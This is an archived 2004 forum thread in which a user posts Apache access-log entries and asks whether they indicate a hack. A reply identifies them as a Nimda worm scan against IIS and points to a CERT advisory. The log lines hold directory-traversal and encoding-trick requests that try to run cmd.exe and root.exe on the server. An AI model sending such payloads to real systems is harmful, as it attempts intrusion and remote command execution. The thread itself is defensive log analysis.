Was I Hacked???

treedstang · 05-20-2004, 08:54 AM

Hey guys and gals I'm trying to find out if the info below is a indicator that someone was trying or did hack into my Http apache server. Source IP address was replaced with a bogous address of "12.34.56.78"
Let me know what you think . I pulled this info from my access.log

Thanks

Tim

12.34.56.78 - - [17/May/2004:11:54:48 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:48 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:49 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:50 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 967 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"
12.34.56.78 - - [17/May/2004:11:54:51 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1034 "-" "-"

Capt_Caveman · 05-20-2004, 09:00 AM

It's a nimda scan. It exploits unpatched Microsoft Windows IIS webservers and the scans are harmless to systems running linux (despite being annoying). You can get more info on the nimda worm here:

http://www.cert.org/advisories/CA-2001-26.html

treedstang · 05-20-2004, 09:41 AM

Capt_Caveman,

Thanks for the quick reply... I'm checking out the link now

Tim